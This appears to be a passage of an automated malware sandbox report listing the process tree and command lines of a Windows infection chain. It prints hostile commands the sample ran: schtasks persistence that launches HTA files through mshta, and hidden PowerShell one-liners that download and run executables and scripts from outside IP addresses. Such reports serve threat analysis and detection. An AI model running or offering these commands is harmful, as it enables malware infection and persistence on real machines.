Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2428 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 2428 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 2428 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 2428 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe C:\Windows\SysWOW64\mshta.exe
PID 1664 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1664 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1664 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1664 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3012 wrote to memory of 2536 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2536 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2536 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2536 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2536 wrote to memory of 2748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE
PID 2536 wrote to memory of 2748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE
PID 2536 wrote to memory of 2748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE
PID 2536 wrote to memory of 2748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE
PID 2748 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2748 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2748 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2748 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 984 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 984 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 984 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 984 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2956 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2512 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2512 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 984 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 984 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 984 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 984 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2252 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2252 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2252 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2252 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2204 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2204 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2204 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2204 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 984 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 984 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 984 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 984 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 1512 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1512 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1512 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1512 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2736 wrote to memory of 2688 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2736 wrote to memory of 2688 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2736 wrote to memory of 2688 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2736 wrote to memory of 2676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2736 wrote to memory of 2676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2736 wrote to memory of 2676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2736 wrote to memory of 1944 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe

"C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Qb143ma2zHB /tr "mshta C:\Users\Admin\AppData\Local\Temp\0UKNe0vh1.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\0UKNe0vh1.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Qb143ma2zHB /tr "mshta C:\Users\Admin\AppData\Local\Temp\0UKNe0vh1.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE

"C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EDC8.tmp\EDC9.tmp\EDCA.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72e9758,0x7fef72e9768,0x7fef72e9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2040 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2356 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2368 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1144 --field-trial-handle=1268,i,14999577278458644125,16314066506809105900,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109460101\cf6ef5812d.exe

"C:\Users\Admin\AppData\Local\Temp\10109460101\cf6ef5812d.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn k2ACdmahMtW /tr "mshta C:\Users\Admin\AppData\Local\Temp\6Ejx4FFn8.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\6Ejx4FFn8.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn k2ACdmahMtW /tr "mshta C:\Users\Admin\AppData\Local\Temp\6Ejx4FFn8.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72e9758,0x7fef72e9768,0x7fef72e9778

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10109470121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1308,i,6127321024989645537,3439106951061104817,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1308,i,6127321024989645537,3439106951061104817,131072 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "IKw8bmaSHUi" /tr "mshta \"C:\Temp\Xs5r6RaJf.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\Xs5r6RaJf.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE

"C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE"

C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe"

C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68d9758,0x7fef68d9768,0x7fef68d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

